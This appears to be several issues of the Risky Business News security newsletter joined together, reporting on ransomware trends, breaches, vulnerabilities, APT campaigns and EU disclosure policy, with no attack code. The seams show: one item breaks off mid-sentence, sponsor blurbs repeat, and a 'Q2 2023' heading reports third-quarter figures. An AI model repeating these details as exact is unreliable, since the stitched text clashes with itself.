Grayling: A new APT group named Grayling has conducted cyber-espionage campaigns since February this year. The group has heavily targeted Taiwanese organizations, leading researchers to believe there might be a China nexus. Besides Taiwan, other targets included a government agency located in the Pacific Islands, as well as organizations in Vietnam and the US.
DPRK operations: Google's Mandiant division has published an updated guide to understanding North Korea's APT and cyber operations, complete with an updated organizational chart. The report's main findings are that DPRK groups now increasingly share resources and temporarily collaborate on operations, making exact attribution extremely difficult.
"Malware infrastructure overlaps indicating resources and attribution muddled by shifting assignments show how DPRK cyber operations are changing. However, operations conducted to fulfill regime requirements remain steadfast and we believe they will continue. While defenders may not be able to easily sort new DPRK activity into a previously identified bucket, the malware reuse and shared resources creates opportunities for detection and country level attribution."
Vulnerabilities, security research, and bug bounty
CVE-2023-44487 - the HTTP/2 Rapid Reset DDoS attack vector
Libcue vulnerability: The GitHub security team has found a major vulnerability in Libcue, a small library for processing audio metadata known as CUE sheets. Tracked as CVE-2023-43641, the vulnerability impacts all Linux distros that use the GNOME desktop environment, where Libcue is included by default. The vulnerability allows threat actors to compromise these systems just by downloading a CUE audio file. The attack works because GNOME reads all newly created files, triggering the malicious code hidden inside the file.
Cobalt Strike update: Fortra has released a security update (v4.9.1) for the Cobalt Strike framework. Also, in CS news, v4.9 was leaked on hacking forums and is now most likely to be adopted by most threat actors.
Windows zero-day report: IBM's X-Force team has a technical write-up on CVE-2023-36802, a zero-day in the Windows Kernel Streaming Server that Microsoft patched last month, in September, and which IBM's Valentina Palmiotti helped discover.
EDR bypass: Wavestone researchers have found an EDR bypass in Windows that abuses a lesser-known process named NtSetInformationProcess.
"In conclusion, the mechanism described in this article actually allows an elevated malicious program wishing to perform nefarious actions (process injection, LSASS dumping, process hollowing, etc.), to carefully disable related telemetry before doing it, removing critical evidence from EDR monitoring, thus greatly improving its chances of not being detected. Multiple pieces of evidence show that Microsoft is aware of the weakness, but is not changing the API behavior retroactively on Windows 10, likely due to retro-compatibility issues."
Infosec industry
New tools—Perfect/Fuse Loader: SpecterOps researcher Evan McBroom has open-sourced two tools named Perfect Loader and Fuse Loader to support an improved in-memory dynamic library loading process on Windows and Linux.
RedHat closes security mailing list: RedHat has closed down its security mailing list. Users can still get security alerts via a free RSS feed or a notification system for paying customers.
Designer Vulnerabilities: Security researcher Mike Sass is maintaining a portal named Designer Vulnerabilities, containing a list of all fancy-pants vulnerabilities that have names, logos, custom websites, and such. The current tally is 407.
CISO salaries: CISO salaries have gone up by 11% in 2023, but growth has slowed, and fewer open positions are currently available. The average CISO salary this year has been $550,000, but more than half of CISOs are making below $400,000. According to a joint study of compensation data from more than 600 CISOs across Canada and the US, the best-paying jobs are on the US West Coast and in the tech and financial sectors. [Additional coverage in CybersecurityDive]
Podcast: Between Two Nerds
In this edition of Between Two Nerds Tom Uren and The Grugq examine the opportunities that ransomware gangs and business email compromise/romance scammers have to collaborate.
This newsletter is brought to you by Netwrix, an IT security software company that enables security professionals to strengthen their security and compliance posture across all three primary attack vectors: data, identity, and infrastructure. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
The number of human-operated ransomware attacks has more than doubled over the past year, Microsoft said in its yearly Digital Defense Report.
The term "human-operated ransomware" refers to certain intrusions where the ransomware is deployed manually rather than using automated scripts.
During these intrusions, one or more members of the ransomware group manually connect to a breached network and run commands in a terminal to make sure scripts execute with the proper parameters, data is exfiltrated without errors, and files are encrypted correctly.
These types of attacks have become the modus operandi of all the major top-tier ransomware gangs and their affiliates.
The number of human-operated ransomware incidents fell in 2022 after the start of the Russian-Ukrainian conflict, as the cybercrime underworld wrestled with allegiances, nationalism, and a reshuffling of services.
The disruption was short-lived, though, and by the end of the year, things began to return to normal and even continue their upward growth trajectory. A Chainalysis report from July estimated that ransomware gangs would stand to make $890 million by the end of 2023, which would give ransomware gangs their second most profitable year on record after 2021—when they extorted around $940 million from victims.
Coveware, Emsisoft, and NCC Group have confirmed a return from normal in ransomware operations through 2023. The shock of the Russo-Ukrainian conflict has worn off, and ransomware gang are continuing their marauding like nothing has happened.
The bounce-back is visible in Microsoft's numbers too. The company says that in June alone, human-operated ransomware incidents accounted for 40% of all ransomware detections. That's a huge figure if we compare it with the automated ransomware deployment campaigns that are getting blasted all over the internet on a daily basis. Think of ransomware delivered via malspam (malicious email spam) or hidden inside cracked software.
Microsoft credits this to a rise in the number of RaaS (Ransomware-as-a-Service) platforms and the affiliates they have been recruiting.
"Most of these attacks can be attributed to 123 tracked ransomware-as-a-service affiliates. The number of affiliates grew by 12 percent in the last year, setting up conditions for human-operated ransomware attacks to continue to grow in 2024."
Human-operated ransomware is also not a term that applies to the high-end enterprise market. These attacks target everyone, from small legal offices in a third-world country to official government organizations alike.
Microsoft says that 70% of the organizations targeted by a human-operated ransomware attack had fewer than 500 employees.
In a small fraction of cases, the ransomware groups also successfully exfiled data from the hacked organization as well—in a tactic known as double-extortion, with the ransomware gang asking victims to pay to decrypt files AND not publish the victim's stolen data on the dark web.
While we honestly thought this happens in the vast majority of targeted ransomware attacks, Microsoft put this number at a low 13%.
As we've heard from other cybersecurity vendors, most of these attacks happen after ransomware gangs get ahold of valid/hacked accounts, they get access to remote external access services (VPN, RDP, etc.), or they exploit vulnerabilities in public-facing apps and appliances (think of Zoho ManageEngine, MSFT Exchange, MOVEit, or PaperCut). Per Microsoft, the top three initial access vectors were evenly split, showing that "criminals are consistently exploiting the same vectors."
A Secureworks report last week found that once inside, ransomware gangs are quite fast at weaponizing their access, with half the ransomware incidents in the past year triggering less than a day after initial access.
Besides ransomware, the same report also touched on a few other topics. We summarized some of the main findings:
Of the 78% of IoT devices with known vulnerabilities on customer networks, 46% cannot be patched.
Attacks targeting open-source software have grown on average 742% since 2019.
Fewer than 15% of NGOs have cybersecurity experts on their staff.
Coin-mining activity was found in 4.2% of all IR engagements.
17% of intrusions involved known RMM tools.
AitM phishing domains grew from 2,000 active domains in June 2022 to more than 9,000 in April 2023.
156,000 daily BEC attempts were observed between April 2022 and April 2023.
41% of the threat notifications Microsoft sent to online services customers between July 2022 and June 2023 went to critical infrastructure organizations.
The first quarter of 2023 saw a dramatic surge in password-based attacks against cloud identities.
Microsoft blocked an average of 4,000 password attacks per second over the past year.
Approximately 6,000 MFA fatigue attempts were observed per day.
The number of token replay attacks has doubled since last year, with an average of 11 detections per 100,000 active users in Azure Active Directory Identity Protection.
DDoS attacks are on the rise, with around 1,700 attacks taking place each day, cumulating at up to 90 Terabits of data per second (Tbps).
State-sponsored activity pivoted away from high-volume destructive attacks in favor of espionage campaigns.
50% of destructive Russian attacks we observed against Ukrainian networks occurred in the first six weeks of the war.
Ghostwriter continues to conduct influence campaigns attempting to sow distrust between Ukrainian populations and European partners who support Kyiv—both governmental and civilian.
Iranian operations have expanded from Israel and the US to target Western democracies and NATO.
Palestinian Hamas (Storm-1133) activity intensified in 2023.
Breaches, hacks, and security incidents
Oospy shuts down: A spyware operation named Oospy has shut down operations. According to TechCrunch, the company appears to be a successor of Spyhide, an Android spyware company that got hacked earlier this year.
MGM to lose $100mil from ransomware attack: MGM Resorts expects to lose $100 million in the aftermath of a ransomware attack that crippled operations at its US properties last month. The company will also incur a $10 million loss resulting from consulting and legal fees related to the incident. In an SEC filing, MGM says the hackers who breached its network also stole the personal information of customers who used its hotels and casinos prior to March 2019. Stolen data includes names, phone numbers, email addresses, dates of birth, and driver's license numbers.
Blackbaud breach settlement: Cloud software provider Blackbaud has reached a jointsettlement with the attorneys general of 49 US states over a July 2020 ransomware attack. The incident exposed the data of more than 13,000 of the company customers and the personal information of millions of their respective users. Blackbaud will pay $49.5 million, which the officials will provide as a settlement to affected users in their states.
DCBOE hack: The District of Columbia Board of Elections says a hacker breached its systems and stole data on registered voters. The agency confirmed the breach after a hacker started selling the agency's data on an underground hacking forum. The hacker claimed to be in possession of more than 600,000 records. [Additional coverage in Cyberscoop]
Caesars' breach: Caesars' Hotel and Casinos has disclosed its late-August security breach to US state OAGs. The company says the incident impacted its loyalty program database, but it has yet to determine the number of affected customers so far. As a reminder, Caesars' is the one who paid the ransom, while MGM didn't and had its network encrypted.
Stars Arena crypto-heist: A threat actor has exploited a vulnerability in one of the smart contracts of the Stars Arena cryptocurrency platform and stolen $2.85 million worth of crypto assets.
DPRK suspected of Mixin hack: North Korean hackers are the prime suspects in the massive hack of cryptocurrency exchange Mixin. A White House official told Bloomberg Lawlast week the hack bears the hallmarks of a classic DPRK operation. The Hong Kong-based platform was hacked at the end of September and lost $200 million worth of crypto assets.
KMA cyberattacks: The Korea Meteorological Administration says it has seen a 378% increase in cyberattacks targeting its systems over the past four years. KMA officials believe the attackers are going after information about its supercomputer center and information centers that process weather information directly related to national security. Earlier this year, South Korean officials said they found a "spy chip" in KMA weather-measuring instruments made in China. [Additional coverage in EnergyDaily]
RedLights hack: A hacker has breached the systems of Belgian escort website RedLights and stole the data of more than 415,000 users. The company says that of the stolen data, two-thirds of the accounts are inactive. The rest of the data is for 87,000 registered users and 41,000 sex workers advertising their services on the site. RedLights says [NSFW link] the attacker exploited a "manual coding error" to gain access to its website and is now threatening to sell the stolen data online. The company says it started encrypting personal data and private messages in February 2023, but data older than that may pose a threat to its users.
General tech and privacy
Grindr complaint: The EPIC privacy group has asked the FTC to investigate dating app Grindr for multiple privacy violations, including failing to delete the personal data of users who uninstalled the app and deleted their accounts.
Google Docs tracking links: Google is secretly inserting tracking parameters inside links in documents exported from Google Docs.
Cortana removal: Microsoft has removed the Cortana smart assistant from Windows 11 insider builds.
Brave layoffs: Brave Software has laid off 9% of its workforce, per TechCrunch.
Python survey:Around 7% of all Python developers are still using the deprecated 2.x branch.
"The number of Python 2 users has remained nearly the same for the last 3 years, below 7%. Nevertheless, some people still use version 2 for data analysis (29%), computer graphics (24%), and DevOps (23%)."
Government, politics, and policy
US location data scandal: The DHS Office of Inspector General has found that three US law enforcement agencies broke the law when they bought location data from the private sector. The DHS OIG says the CBP, ICE, and Secret Service did not follow the E-Government Act of 2002, which required the agencies to have strict privacy and access control policies in place. [Additional coverage in 404 Media]
Melissa partnership: Dutch police and representatives from ten major Dutch private sector companies have signed the Melissa partnership, an agreement to speed up cooperation procedures meant to help fight and disrupt ransomware operations in the Netherlands.
Sponsor section
In this Risky Business News sponsor interview Tom Uren asks Martin Cannard, VP of Product Strategy at Netwrix, how privileged access management can help defend organisations. 'Advanced Persistent Teenagers' regularly use social engineering techniques to compromise highly privileged accounts, but that doesn't mean it's instantly game over.
Cybercrime and threat intel
FTC social media scam numbers: The FTC says Americans have lost more than $2.7 billion since 2021 to online scams carried out via social media. This year alone, social media accounted for more than half of all reported losses, with many of the scams focusing on cryptocurrency theft. The FTC says social media is currently the preferred method of contact for most scammers, especially for younger targets, as it can allow threat actors to easily manufacture a fake persona, hack into your profile, pretend to be you, and con your friends.
"Social media gives scammers an edge in several ways. They can easily manufacture a fake persona, or hack into your profile, pretend to be you, and con your friends. They can learn to tailor their approach from what you share on social media. And scammers who place ads can even use tools available to advertisers to methodically target you based on personal details, such as your age, interests, or past purchases. All of this costs them next to nothing to reach billions of people from anywhere in the world."
New scam hitting SG: Forty-three Singaporeans lost more than $880,000 over the course of September 2023 to travel scammers advertising on social networks like Facebook and Instagram. Police say the scammers used travel ads to lure users into private conversations and then to install malicious Android apps on their devices. The apps collected e-banking details and granted the attackers access to the device. [Additional coverage in the Strait Times]
Webwyrm scammer group: A threat actor named Webwyrm is believed to have made more than $100 million from online scams. The group runs more than 6,000 websites that imitate legitimate brands and redirect incoming visitors to hundreds of WhatsApp numbers and Telegram channels where victims get defrauded. According to security firm CloudSEK, the group has made more than 100,000 victims across over 50 countries over the course of just a few months since late 2022.
Storm-0324: Trellix has a report on Storm-0324, a threat actor operating as an initial access broker for Tempest Sangria (TA543, Clop), a known ransomware affiliate. Microsoft had a similar report on this couple last month. Both reports cover Storm-0324's use of Microsoft Teams for initial access.
Citrix NetScaler campaign: A threat actor is hacking Citrix NetScaler devices and modifying login pages to add a script that harvests login credentials. The campaign appears to have started in early August and has compromised at least 600 NetScaler systems, according to IBM's X-Force security team. The attacks are leveraging CVE-2023-3519, a vulnerability Citrix patched this July. The same vulnerability was also exploited to drop the AlphV ransomware shortly after the patch.
New npm malware: Twenty-three malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.
Israel-Gaza hacktivism: StrikeSource threat intel analyst Julian B. has a timeline of hacktivist activity in the aftermath of the recent Hamas-Israel conflict. More here.
"Of interest is the speed at which Anonymous Sudan launched it's first DDoS attacks against alerting systems. Less than 1 hour after the first rockets were launched against Israel, the alerting systems were taken offline."
BreachForums responds: After last week the operators of the RansomedVC ransomware gang have announced a "partnership" with the BreachForums data trading portals, the site's admin has disavowed any connection or partnership with the gang.
Predator Files: The European Investigative Collaborations (EIC) and Amnesty International have published a joint investigation named the Predator Files that focuses on the "Intellexa alliance," a suite of companies behind the Predator spyware and other surveillance products. Articles have been published in several national outlets describing the company's structure and lobby efforts, and an Amnesty technical report takes a look at all of Intellexa's products and reveals for the first time the Predator backend and UI.
"Amnesty International's analysis of recent technical infrastructure linked to the Predator spyware system indicates its presence, in one form or another, in Sudan, Mongolia, Madagascar, Kazakhstan, Egypt, Indonesia, Viet Nam, and Angola, among others."
Malware technical reports
Supershell botnet: Security researchers from SOCRadar have discovered a new botnet named Supershell. The botnet is built using open-source software, operates by deploying reverse SSH shells on infected systems, and focuses on crypto-mining operations. So far, SOCRadar says it has identified 85 botnet control panels deployed across the internet, suggesting that several threat actors are using the Supershell botnet platform for their operations.
Balada Injector: GoDaddy's Sucuri says the Balada Injector gang is exploiting tagDiv themes and plugins to insert its malware on legitimate sites.
LostTrust ransomware: A SentinelOne analysis of the new LostTrust ransomware shows similarities to the SFile, Mindware, and MetaEncryptor families—and a possible rebrand of the latter. Just like most
Sponsor Section
To protect your business, you need to understand and measure your attack surface and then implement a continuous, comprehensive approach to reducing it. Read Netwrix's guide to learn how to reduce your privileged attack surface and adopt a Zero Trust approach.
APTs and cyber-espionage
NIS warning: South Korea's National Intelligence Service (NIS) says that North Korean hackers have recently shifted targeting and are now going after the country's shipbuilding industry. Officials say the new orders came directly from Kim Jong-un after his joint summit with Russian President Vladimir Putin last month. South Korean officials say Kim ordered his government to focus on building medium-to-large warships. [Additional coverage in SPNews]
North Korean Android malware: Security researcher Ovi Liber takes a look at the evolution of North Korea's Android malware—namely, the ROKRAT and RambleOn strains.
UAC-0006: CERT-UA says that a financially motivated group tracked as UAC-0006 launched four waves of cyberattacks last week, aiming to infect Ukrainian government agencies with the SmokeLoader malware.
Z bloggers influence ops: DarkOwl looks at the top three Russian "Z blogger" propagandists and their Telegram channels pushing pro-invasion propaganda.
Vulnerabilities, security research, and bug bounty
Google VRP news: Google plans to pay security researchers for n-day exploits in Chrome's V8 engine and Google Cloud's Kernel-based Virtual Machine (KVM). The new Google VRP program will pay bug bounty hunters for developing exploits for vulnerabilities they didn't discover. Google says it's looking to learn from exploit developers who may not be interested in finding new vulnerabilities but use unique exploitation techniques the company might want to mitigate.
CISA removes KEV exploits: For the first time, CISA has removed exploits from KEV, its database of actively exploited vulnerabilities. The agency removed five vulnerabilities in the Owl Labs video conferencing software, which CISA added to KEV in mid-September.
Apple vulnerability: Moonlock researchers look at CVE-2022-48574, a now-patched vulnerability in the Apple NSServices feature.
Sangfor firewall vulnerability: watchTowr Labs has found five vulnerabilities in NextGen Application Firewall (NGAF), a firewall manufactured by Chinese security firm Sangfor. The vulnerabilities include issues like an authentication bypass, command injection, and SQL injection. Researchers say Sangfor has not patched any of the issues and has even called some of its reports "false positives." No CVEs have been assigned.
CCC returns: The Chaos Communication Congress is returning as a live event after a three-year hiatus caused by the COVID-19 pandemic.
Infosec investments in Q2 2023: The Pinpoint Search Group says it tracked more than $2.3 billion in cybersecurity funding rounds and investments across the third quarter of 2023. The number is 21% up compared to the same period in 2022, when cybersecurity firms raised $1.86 billion. This year, cybersecurity vendors raised $7.1 billion over 261 rounds.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq examine whether offensive cyber operations against ransomware groups have succeeded or failed. And how would we even know?
This newsletter is brought to you by Proofpoint. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
A group of more than 50 tech experts and organizations have signed an open letter asking EU officials to rethink Article 11 of the upcoming EU Cyber Resilience Act.
The article introduces a mandatory requirement for all software vendors to disclose vulnerabilities to the ENISA, the EU's cybersecurity agency, within 24 hours of becoming aware of in-the-wild exploitation. ENISA will then relay this information to national CSIRT teams and stock market watchdogs across its member states.
The open letter's signatories argue that the CRA's Article 11—in its current form, at least—greatly expands the number of organizations that will have first-hand and real-time immediate knowledge of actively exploited vulnerabilities, which, in turn, increases the risks to product vendors, their customers, and the general public.
Signatories raise three main issues with Article 11's broadened zero-day disclosure spectrum.
First, they fear that information on actively exploited bugs will eventually make its way into the hands of some intelligence agencies and be abused for intelligence and surveillance operations. Not a bad argument, especially after some EU member states have been caught abusing spyware in obvious cases of human rights abuse and illegal surveillance over the past 3-4 years.
Second, signatories argue that with so many new parties involved in dealing with zero-day information, there is now the risk of more leaks and accidental disclosures. Such cases would provide details about active exploitation to threat actors, who could then (re)create the exploits and abuse the same bugs in their own campaigns.
Third, experts also fear the new EU zero-day disclosure rules will interfere with existing coordinated disclosure procedures, which, in some cases, tend to keep ongoing exploitation secret until they can prepare and test patches.
"As a result, the CRA may reduce the receptivity of manufacturers to vulnerability disclosures from security researchers, and may discourage researchers from reporting vulnerabilities, if each disclosure triggers a wave of government notifications."
I'm not sure about this particular point, but the first two have their merits.
The open letter criticizes the CRA Article 11 but also proposes a set of modifications.
Agencies should explicitly be prohibited from using or sharing vulnerabilities disclosed through the CRA for intelligence, surveillance, or offensive purposes.
The CRA should not require reporting of vulnerabilities that are exploited through good faith security research.
Require reporting to agencies of mitigatable vulnerabilities only, within 72 hours of effective mitigations (e.g., a patch) becoming publicly available.
The letter's signatories include representatives from Google, Arm, the EFF, and many of today's top security vendors like Bitdefender, ESET, Trend Micro, Rapid7, HackerOne, BugCrowd, and Tenable.
Breaches, hacks, and security incidents
23andMe denies breach: DNA and genetic testing service 23andMe denies having suffered a security breach after a threat actor claimed to have hacked the company and stole the DNA-related data of more than seven million registered users.
Sony breach: Sony Interactive Entertainment has joined the list of more than 2,300 companies impacted by the MOVEit hacks. The company says the hackers stole data on current and former employees and their families. The breach took place in late May, according to a letter Sony filed with US authorities. Almost 7,000 people are impacted.
Lyca Mobile cyber attack: A cyber attack has impacted the network of British virtual mobile operator Lyca Mobile. The company says the incident disrupted national and international calling and prevented customers from adding new minutes to SIM cards. Lyca says the incident impacted 56 of 60 countries the company is active in. Unaffected markets included the US, Australia, Ukraine, and Tunisia. [Additional coverage in SecurityWeek]
Xiaomi outage: A massive outage has hit Xiaomi devices across Russia and Belarus. The incident prevented user devices from connecting to the Mi Home service. The outage impacted security cameras, vacuum cleaners, and other smart devices. [Additional coverage in RBC]
Major API keys leak: Truffle Security has identified more than 700 live API keys and passwords that were included in GitHub comments. The comments were filed with pull requests and issue trackers. Researchers say human users authored 97% of all the comments and that most commenters had no relation with the projects.
General tech and privacy
ECH in Firefox: Support for Encrypted ClientHello (ECH) has been enabled for all Firefox 118 users. ECH is a new TLS extension that fully encrypts web traffic and doesn't leak a user's website destination. Google rolled out support for ECH in Chrome last month with the release of Chrome 117.
Yahoo anti-spam features: Earlier this week, Google announced a set of new rules for email bulk-senders. Yahoo has announced the same rules. The rules will require bulk senders to authenticate their emails and provide easy ways for users to unsubscribe. The new Yahoo anti-spam rules will come into effect in the first quarter of 2024.
Android 14 is out: Google has announced that its newest Pixel 8 smartphone will receive seven years of software and security updates. Prior to the announcement, Pixel devices were only supported for five years. Google announced the new Pixel 8 extended support on the same day the company released Android 14, the latest version of the Android mobile operating system.
Government, politics, and policy
MACE Act: The US House of Representatives has passed a bill that would remove minimum education requirements on federal cybersecurity jobs. Named the Modernizing the Acquisition of Cybersecurity Experts Act, the bill is the latest in a long series of US legislation aimed at addressing a shortage of cybersecurity experts in federal agencies. The bill passed with an overwhelming 394-1 vote and is now headed to the Senate floor, where it is expected to pass as well. [Additional coverage in FedScoop]
CISA social media ban reinstated: A US federal appeals court has reinstated a ban on CISA from interacting with social media companies as part of the agency's efforts to combat online dis/misinformation. The suit, filed by two Republican Attorneys General, argues CISA is limiting fReE sPeEcH. [Additional coverage in CNN]
Russia tests social scoring system: A Russian university has developed and is testing a social scoring system inspired by the one in use in China. Named We (Мы), the platform has been developed by the Russian State Social University in Moscow. The We system will produce a social score for Russians based on their personal life, education, financial status, criminal record, public life, and internet activity. Work on the platform began last year in July 2022, and the first version is now being tested with the university's students. Back in 2018, Russian officials described a Chinese-style social scoring system as "a threat to Russia." [Additional coverage in the Moscow Times]
Cyberattacks on Ukraine power grid: Ukraine Energy Minister German Galushchenko says cyberattacks are a bigger threat to the country's power grid than rockets and drones because the repercussions of a cyber incident can paralyze whole systems rather than impact small substations—as rockets usually tend to do. [Additional coverage in The Economist/non-paywall]
Hacktivism "rules": Two legal advisers for the International Committee of the Red Cross (ICRC) have published a set of eight recommendations/rules for "civilian hackers" (aka hacktivists) involved in an armed conflict. The rules are clearly inspired by the activities of pro-Russian and pro-Ukrainian hacktivists in the recent Russo-Ukrainian conflict. Those groups don't seem to be impressed or care about the new rules. Despite some media reporting that the "ICRC" formally published the new rules, it did not. They were published on a legal blog, and both authors described it as their own opinion. The eight rules are:
Do not direct cyber attacks* against civilian objects.
Do not use malware or other tools or techniques that spread automatically and damage military objectives and civilian objects indiscriminately.
When planning a cyber attack against a military objective, do everything feasible to avoid or minimize the effects your operation may have on civilians.
Do not conduct any cyber operation against medical and humanitarian facilities.
Do not conduct any cyber attack against objects indispensable to the survival of the population or that can release dangerous forces.
Do not make threats of violence to spread terror among the civilian population.
Do not incite violations of international humanitarian law.
Comply with these rules even if the enemy does not.
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Selena Larson, Senior Threat Intelligence Analyst at Proofpoint, about the state of play in the cybercrime ecosystem. People and organizations are getting better at protecting themselves from scams and compromises, but criminals will use every possible avenue to reach people and scam them.
Cybercrime and threat intel
PEACHPIT botnet takedown: Human Security has disrupted the operations of PEACHPIT, a vast ad fraud botnet operated by the BADBOX threat actor. BADBOX assembled the PEACHPIT botnet by selling backdoored Android TV streaming boxes on popular online stores and by spreading malicious Android and iOS apps. The purpose of the botnet was to secretly install apps on the infected devices that would show and play unwanted ads. At its peak, researchers say PEACHPIT was communicating with more than 121,000 Android devices and more than 159,000 iOS devices a day. Human says the BADBOX group operates out of China and most likely has access to hardware supply chains.
Casinos are laundering cybercrime profits: A ProPublica investigation has found that casinos in Cambodia, Laos, and Myanmar are helping local cybercrime groups launder funds obtained through online scams.
Bentley servers: An investigation has linked servers hosting LockBit stolen data to Bentley, a former member of the Conti gang. Researchers say the server is hosted in Moscow. A Palo Alto Networks investigation last week also found that the Clop gang has been hosting some of its servers in Moscow as well.
Qakbot gang: The threat actors behind the recently dismantled Qakbot botnet have now switched to distributing the Remcos RAT and the Knight ransomware, per Cisco Talos.
SpyNote evolution: Mobile security firm Pradeo says it is seeing the SpyNote spyware evolve from a RAT to a banking trojan.
Stream-jacking attacks: Bitdefender says it's seeing threat actors hijack popular YouTube channels to push Musk-themed crypto-scams. Welcome to 2016!
Polymorphic EDR Killer: CyFirma security researcher Kaushík Pał has discovered threat actors advertising a new EDR killer app that can mutate its code in order to avoid detection.
ICS exposure: Bitsight says it identified more than 100,000 industrial control systems (ICS) exposed on the internet. This includes equipment like sensors, tank gauges, building management systems, actuators, valves, relays, and more.
Dwell time plummets: Threat actors are deploying ransomware on breached networks faster than ever before. In just 12 months, the median dwell time of ransomware groups on hacked networks has fallen from 4.5 days to less than one day. According to security firm Secureworks, ransomware is being deployed within one day of initial access in more than 50% of engagements and within five hours of initial access within 10% of cases.
Rootkits on npm: ReversingLabs has discovered a malicious package on the npm repository that infected developer workstations with a rootkit and a remote access trojan. The package was live for several days and downloaded more than 700 times.
PyPI crypto hacker: A threat actor has stolen more than $100,000 worth of cryptocurrency from Python developers this year. The attacker used hundreds of malicious Python libraries uploaded to the official PyPI portal. The libraries contained a Windows infostealer that collected passwords and other valuable data from infected developer machines. Security firm Checkmarx says the campaign began in April this year, and its sophistication grew each month with more layers of obfuscation and encryption.
Malware technical reports
GoldDigger: Group-IB has discovered a new banking trojan named GoldDigger that specifically targets users of over 50 Vietnamese banking, e-wallets, and crypto-wallet apps.
Snake keylogger: ANY.RUN has a breakdown of the Snake keylogger.
RevengeRAT: Embee Research explains how to extract configuration data from RevengeRAT samples.
New Mirai variants: Chinese security firm NSFOCUS takes a look at three recent versions of the Mirai DDoS malware—hailBot,kiraiBot, catDDoS.
Sponsor Demo Section
Ryan Kalember shows Risky Business host Patrick Gray Proofpoint's Sigma platform. Sigma is a data loss prevention and insider threat detection tool that crunches data from different sources and presents a unified view of it.
APTs and cyber-espionage
Semiconductor spying: A Chinese cyber-espionage group has launched a campaign against semiconductor companies in Taiwan, Hong Kong, and Singapore. The attack involves a spear-phishing campaign with a TSMC lure that tries to infect targets with a version of the HyperBro loader. The malware was previouslyused in attacks carried out by the Iron Tiger group, also known as APT27, Budworm, LuckyMouse, or Emissary Panda.
Operation Jacana: ESET researchers have identified a cyber-espionage campaign targeting a governmental entity in Guyana. While ESET has not formally attributed the attacks, they believe the campaign was the work of a China-aligned threat group.
Vulnerabilities, security research, and bug bounty
NVD milestone: The US NIST National Vulnerability Database (NVD) is now storing information on more than 200,000 vulnerabilities. (h/t Patrick Garrity)
Top 10 misconfigs: The blue and red teams at CISA and the NSA have published a list with the top 10 most common misconfigurations they have encountered in large organizations. The shortlist is below, and a full breakdown is in the joint document.
Default configurations of software and applications
Improper separation of user/administrator privilege
Insufficient internal network monitoring
Lack of network segmentation
Poor patch management
Bypass of system access controls
Weak or misconfigured multi-factor authentication (MFA) methods
Insufficient access control lists (ACLs) on network shares and services
Poor credential hygiene
Unrestricted code execution
Apple zero-days: Apple has released a security update for iOS devices to patch two actively exploited zero-days. The first is a vulnerability (CVE-2023-42824) in the iOS kernel that Apple says was exploited against older iPhones using iOS 16.6 or lower. The second is a zero-day (CVE-2023-5217) in the Libvpx library that Google discovered last week, and Apple also ported and fixed in iOS.
Confluence zero-day: Atlassian has released a security update to patch an actively exploited zero-day in Confluence "Data Center" and "Server" appliances. Tracked as CVE-2023-22515, the vulnerability can be used to create unauthorized admin accounts and access Confluence resources. The vulnerability has a severity rating of 10/10.
macOS DirtyNIB vulnerability: Security researcher Adam Chester has discovered a vulnerability that allows malicious processes to hijack macOS app entitlements. Chester named the vulnerability DirtyNIB as the exploit relies on replacing NIB files inside app bundles while not breaking an app's entitlements and Gatekeeper verification.
cURL security fix coming: The cURL library will receive a security fix on October 11; a high-rated vulnerability and described as one of the most severe issues patched in cURL in recent years.
X.org vulnerabilities: The X.org team has patched five vulnerabilities in two of its component libraries.
Cisco security updates: Cisco has released five security updates, including a patch to remove credentials for the root account from some of its firmware.
Printer vulnerabilities: Devcore has published a detailed write-up on three printer vulnerabilities it used at the Pwn2Own hacking contest back in 2021. The vulnerabilities are pre-auth RCEs and impact Canon, HP, and Lexmark printers.
Looney Tunables PoCs: Several PoCexploits have been published for Looney Tunables, a recently disclosed LPE in the glibc library.
Supermicro BMC bugs: Supermicro has released a security update to patch seven vulnerabilities in the IPMI firmware of its BMC products. Several of the patched vulnerabilities can be exploited by unauthenticated attackers to gain root access to remote systems via the BMC web-facing frontend. More than 70,000 Supermicro IPMI BMC systems have their web interfaces exposed on the internet. Researchers at Binarly say Supermicro tried to reduce the severity of its bugs during the disclosure process and encourages companies to apply the available patches as soon as possible.
"Unfortunately, as usually happens during the disclosure process, the vendor tried to reduce the final impact of the documented vulnerabilities. We believe this to be an extremely wrong position, since end customers will have incorrect information when assessing the severity of a particular update. We encourage system administrators to keep their BMC systems up to date and follow NSA and CISA hardening guidelines."
Infosec industry
BlackBerry split: BlackBerry plans to separate its IoT and cybersecurity services into two independently operated entities and then file for an IPO for its IoT subsidiary.
Free cybersecurity help for NGOs: A consortium of cybersecurity organizations will provide free cybersecurity services to more than 200 NGOs around the globe.
CISA Security Planning Workbook: CISA has published a new free resource named the Security Planning Workbook, a document meant to help organizations create basic security plans.
IAM guidance for vendors: CISA and the NSA have published guidance for software vendors and developers on how to properly implement multi-factor authentication (MFA) and single sign-on (SSO) technologies in order to develop better Identity and Access Management (IAM) systems. The two agencies say the new guidance is complementary to guidance it published earlier this year in March that targeted IT admins.
New tool—OpenPubkey: The Linux Foundation has open-sourced OpenPubkey, an open-source cryptographic protocol designed to secure software supply chains.
"OpenPubkey enables users to securely and accurately bind cryptographic keys to users and workloads by turning an OpenID Connect Identity Provider (IdP) into a Certificate Authority (CA)."
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq examine whether offensive cyber operations against ransomware groups have succeeded or failed. And how would we even know?
This newsletter is brought to you by Proofpoint. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Ransomware groups are exploiting recently disclosed vulnerabilities in TeamCity and WS_FTP servers to breach corporate networks and ransom organizations.
The first is an authentication bypass and RCE vulnerability that can allow threat actors to take full control of JetBrains TeamCity CI/CD servers. Once on the development pipeline, threat actors can pivot to other resources on a company's internal or cloud network, from where ransomware gangs can do extensive damage.
The second is a remote code execution in WS_FTP, a file-transfer application developed by Progress Software—the same company that also made the MOVEit file-sharing server, heavily exploited by the Clop gang earlier this year in hacks that impacted more than 2,000 organizations. This bug is particularly nasty because it can be exploited with one HTTPS POST request.
